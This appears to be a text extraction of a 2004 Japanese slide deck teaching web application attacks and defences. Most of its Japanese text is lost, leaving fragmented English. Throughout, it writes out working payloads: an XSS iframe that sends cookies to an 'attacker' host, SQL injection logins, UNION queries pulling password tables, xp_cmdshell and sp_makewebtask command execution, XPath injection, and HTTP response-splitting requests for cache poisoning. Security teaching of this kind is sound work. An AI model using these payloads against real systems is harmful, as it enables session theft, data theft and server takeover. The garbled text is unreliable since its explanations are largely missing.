shio_20041207r2.ppt[読み取り専用]

Web 2004 12 7 <shio@st.rim.or.jp>

Web SQL XPath HTTP 5 URL 2

SQL XPath HTTP 3

Cross-Site Scripting : XSS Web Web CGI Web IIS Apache JavaScript/VBscript Web Web IE Web Cookie ID Web Cookie 4

http://server/xss/greeting.asp 5

<h1>aaa</h1>... <h1>...</h1> heading h1 aaa 6

<script>alert("aaa")</script>... <script>...</script> JavaScript alert(...) script aaa 7

<script>alert(document.cookie)</script>... document.cookie Cookie script Cookie 8

XSS Cookie IE http://attacker/ Cookie Attacker Server Cookie xssgetcookie.pl xss-reply.pl <iframe src="http://server/xss /greeting.asp?name= <script>location.hr ef='http://attacker: 81/'+document.coo kie</script>"></ifra me> Cookie Attacker Attacker Server Cookie Cookie Server 9

HTML HTML < > & " ' < > & " &#39; (); +...... UTF-7 http://server/xss2/greeting.asp XSS 10

Web Web Web ID ID Web ID XSS Cookie URL ID ID 11

Web HTTP TCP ID ID ID ID 12

ID SID:1234 SID:1235 ID SID:1235 SID:1234 SID:1234 SID:1235 SID:1235 SID:1235 13

IIS ASP ID Cookie ASPSESSIONIDCAQRDBCS=IPHPPHBCNCNACKEPJAIBJJDI path / secure Cookie Non-Persistent IIS ID Session("auth") = true Session.Abandon 20 Session.Timeout ID ID??? 14

XSS Cookie ID http://server/db/login.asp... Web login.asp menu.asp Anne Janet ID Steven hehehe hahaha hohoho process1.asp process2.asp logout.asp 15

Attacker ID xss-reply2.pl xssgetcookie.pl ID menu.asp Server Server Web ID XSS Cookie ID Attacker ID 16

Session Fixation ID fix Web ID ID ID URL XSS Cookie Web ID ID Web 17

SID:1234 ID SID:1234 SID 1234 SID:1234 SID:1234 SID:1234 ID 1234 SID 1234 HTML ID SID:1234 SID 1234 18

XSS Cookie ID Attacker ID xss-setcookie.pl ID menu.asp Server Server... ID Server Web ID XSS /Server Cookie ID ID 19

ID ID IIS ID Web ID Cookie Hidden? XSS Web IIS http://server/db2/login.asp 20

SQL Web SQL Web SQL Structured Query Language... DB SELECT Username FROM Users WHERE Username = 'X' AND Password = 'Y'... Users Username X Password Y Username SQL X Y SQL SQL...... 21

SQL http://server/db2/menu.asp login.asp SELECT * FROM Passwords WHERE Name = '" & Request.Form("uid") & "' AND Password = '" & Request.Form("pass") & "' menu.asp process1.asp process2.asp logout.asp Passwords Name Password Steven hehehe Anne hahaha Janet hohoho 22

SQL SQL ' or 'a'='a? ID aaa ' or 'a'='a SELECT * FROM Passwords WHERE Name = '" & Request.Form("uid") & "' AND Password = '" & Request.Form("pass") & "' SELECT * FROM Passwords WHERE Name = 'aaa' AND Password = '' or 'a'='a' SELECT... 23

SQL http://server/db2/login.asp ID aaa ' or 'a'='a... 24

SQL UNION UNION... SQL A 1111 2345 5555.................. B 8888 8765 3333.................. SELECT, FROM A UNION SELECT, FROM B 1111 2345 5555 8888 8765 3333 25

SQL UNION http://server/db2/process2.asp login.asp menu.asp process1.asp process2.asp logout.asp SELECT LastName, FirstName, Title, Address FROM Employees WHERE FirstName LIKE '% " & Request.Form("search") & "%' Employees LastName FirstName Title Address Buchanan Steven...... Dodsworth Anne...... Leverling Janet...... 26

SQL UNION SQL xxxx' union select name, id, xtype, parent_obj from sysobjects where name like '? SELECT LastName, FirstName, Title, Address FROM Employees WHERE FirstName LIKE '%" & Request.Form("search") & "%' SELECT LastName, FirstName, Title, Address FROM Employees WHERE FirstName LIKE '%xxxx' union select name, id, xtype, parent_obj from sysobjects where name like '%' Employees sysobjects... sysobjects DB 27

SQL http://server/db2/login.asp ID Steven / hehehe xxxx' union select name, id, xtype, parent_obj from sysobjects where name like '... 28

SQL sysobjects DB xtype... U: S: V:... Passwords ID xxxx' union select name, id, 'a', 'a' from syscolumns where id = Passwords ID and name like ' 29

SQL Passwords Name Password Passwords ID xxxx' union select name, password, 'a', 'a' from passwords where name like ' 30

SQL Stored procedure... MS SQL Server SQL Web MS SQL Server xp_cmdshell... OS sp_makewebtask... HTML 31

SQL xp_cmdshell sp_makewebtask xp_cmdshell OS xp_cmdshell {'command_string'} [, no_output] exec master..xp_cmdshell 'dir *.exe' sp_makewebtask HTML sp_makewebtask [@outputfile =] 'outputfile', [@query =] 'query' [,...] exec sp_makewebtask 'c: inetpub wwwroot out.html', 'select * from passwords' exec sp_makewebtask 'c: inetpub wwwroot out.html', "exec master..xp_cmdshell 'dir *.exe'" 32

SQL SQL xp_cmdshell server ping IP PC windump/tcpdump windump -n host IP and icmp windump http://server/icmpsniff.exe icmpsniff IP IP http://server/db2/login.asp ID aaa xxx'; exec master..xp_cmdshell 'ping IP SELECT * FROM Passwords WHERE Name = 'aaa' AND Password = 'xxx' ; exec master..xp_cmdshell 'ping IP ' SQL 33

SQL ID SQL... ID xxx'; exec master..xp_cmdshell 'ping IP ';-- xxx SELECT * FROM Passwords WHERE Name = 'xxx' ; exec master..xp_cmdshell 'ping IP '; -- ' AND Password = 'xxx' SQL SQL 34

SQL SQL sp_makewebtask server HTML http://server/db2/login.asp ID aaa xxx'; exec sp_makewebtask 'c: inetpub wwwroot.html', "exec master..xp_cmdshell 'dir *.exe'" ; -- SELECT * FROM Passwords WHERE Name = 'aaa' AND Password = 'xxx'; exec sp_makewebtask 'c: inetpub wwwroot.html', "exec master..xp_cmdshell 'dir *.exe'" ; --' http://server/.html 35

SQL SQL SQL ' '' SQL DBMS DBMS SQL SQL prepared statements DBMS http://server/db3/login.asp SQL 36

XPath Web XPath XML XPath Web XPath XML Path Language... XML /UserList/User[Name='X' and Password='Y']... /UserList/User Name X Password Y XPath X Y XPath... XML 37

XPath http://server/xpath/auth.asp auth.asp XML /UserList/User[Name='" & Request.Querystring("uid") & "' and Password='" & Request.Querystring("pass") & "'] userlist.xml <?xml version="1.0" encoding="iso-8859-1"?> <UserList> <User> <Name>Steven</Name> <Password>hehehe</Password> <Title>Sales Manager</Title> <Address>14 Garrett Hill</Address> </User> <User> <Name>Anne</Name> <Password>hahaha</Password> <Title>Sales Representative</Title> <Address>7 Houndstooth Rd.</Address> </User> <User> <Name>Janet</Name> <Password>hohoho</Password> <Title>Sales Representative</Title> <Address>722 Moss Bay Blvd.</Address> </User> </UserList> 38

XPath XPath ' or 'a'='a? ID aaa ' or 'a'='a /UserList/User[Name='" & Request.Querystring("uid") & "' and Password='" & Request.Querystring("pass") & "'] /UserList/User[Name='aaa' and Password='' or 'a'='a'] User... 39

XPath http://server/xpath/auth.asp ID aaa ' or 'a'='a... 40

XPath XPath XPath ' ' XPath "? http://server/xpath2/auth.asp XPath 41

HTTP HTTP Response Splitting HTTP Location Web Cookie 42

HTTP GET /redir_lang.asp?lang=english Server HTTP/1.1 302 Object moved Location: english.html GET /english.html GET /redir_lang.asp?lang=%0d%0a %0d%0aHTTP/1.1%20200%20ok %0d%0a<html>poisoned</html> Server HTTP/1.1 302 Object moved Location: = HTTP/1.1 200 ok <html>poisoned</html>.html 43

HTTP GET /redir_lang.asp?lang=%0d%0a %0d%0aHTTP/1.1%20200%20ok %0d%0a<html>poisoned</html> GET /index.html Server HTTP/1.1 302 Object moved Location: = HTTP/1.1 200 ok <html>poisoned</html>.html TCP!! index.html <html>poisoned</html> 44

HTTP Web Attacker GET /redir_lang.asp? lang=%0d%0a%0d %0aHTTP/1.1... GET /index.html Proxy GET /redir_lang.asp? lang=%0d%0a%0d %0aHTTP/1.1... Server GET /index.html HTTP/1.1 302 Location: = GET /index.html HTTP/1.1 200 ok <html>poisoned... index.html <html>poisoned... HTTP/1.1 200 ok <html>poisoned... Proxy 45

HTTP Web http://server/rs/lang.html Apache rs-apache.pl 46

HTTP IE http://attacker/ Attacker Server <frame src=" GET /redir_lang.asp? lang=%0d%0a%0d %0aHTTP/1.1...> <frame src=" GET /index.html> rs-iepoison.pl Attacker Server index.html <html>poisoned... Server 47

HTTP XSS GET /redir_lang.asp?lang=%0d%0a %0d%0aHTTP/1.1%20200%20ok %0d%0a<html><script>alert(doc ument.cookie)</script></html> Server HTTP/1.1 302 Object moved Location: = HTTP/1.1 200 ok <html><script>alert(document.coo kie)</script></html>.html IE http://attacker/ Cookie rs-iexss.pl, xss-getcookie.pl 48

HTTP HTTP HTTP %0d%0a CR/LF HTTP Location Set-Cookie %0d%0a CR/LF... http://server/rs2/lang.html HTTP 49

hidden Cookie HTTP... HTML SQL XPath LDAP HTTP system open... DB... Web DBMS SQL XPath HTML HTTP... 50

WASC Web Security Threat Classification http://www.webappsec.org/threat.html OWASP Guide to Building Secure Web Applications http://www.owasp.org/documentation/guide/guide_about.html OWASP Top Ten Most Critical Web Application Vulnerabilities http://www.owasp.org/documentation/topten.html Cross-site Scripting Overview http://www.microsoft.com/technet/security/news/csoverv.mspx Web Application Security http://www.patrice.ch/en/computer/web/articles/2002/web_security.pdf @IT: http://www.atmarkit.co.jp/fsecurity/special/30xss/xss01.html Web ASP Part 1 http://www.trusnet.com/secinfo/docs/webprog1/index.html 51

Web ASP Part 2 http://www.trusnet.com/secinfo/docs/webprog2/index.html IPA ISEC http://www.ipa.go.jp/security/awareness/vendor/programming/ http://securit.gtrc.aist.go.jp/research/paper/css2001-takagi-dist.pdf Web 31 http://java-house.jp/~takagi/paper/iw2002-jnsa-takagi-dist.pdf Understanding Malicious Content Mitigation for Web Developers http://www.cert.org/tech_tips/malicious_code_mitigation.html Microsoft Windows 2000 Server : http://windows.microsoft.com/windows2000/ja/server/iis/htm/asp/iiapsess.h tm IIS Cookie SSL-Secure http://support.microsoft.com/default.aspx?scid=kb;ja;274149 52

@IT: Web http://www.atmarkit.co.jp/fsecurity/rensai/webhole01/webhole01.html SQL Injection - Are Your Web Applications Vulnerable? http://www.spidynamics.com/papers/sqlinjectionwhitepaper.pdf xp_cmdshell http://www.microsoft.com/japan/msdn/library/ja/tsqlref/ts_xp_aasz_4jxo.asp sp_makewebtask http://www.microsoft.com/japan/msdn/library/ja/tsqlref/ts_sp_mamz_2p0r.asp Blind XPath Injection http://www.sanctuminc.com/pdfc/whitepaper_blind_xpath_injection_20040 518.pdf "Divide and Conquer" - HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics http://www.sanctuminc.com/pdf/whitepaper_httpresponse.pdf 53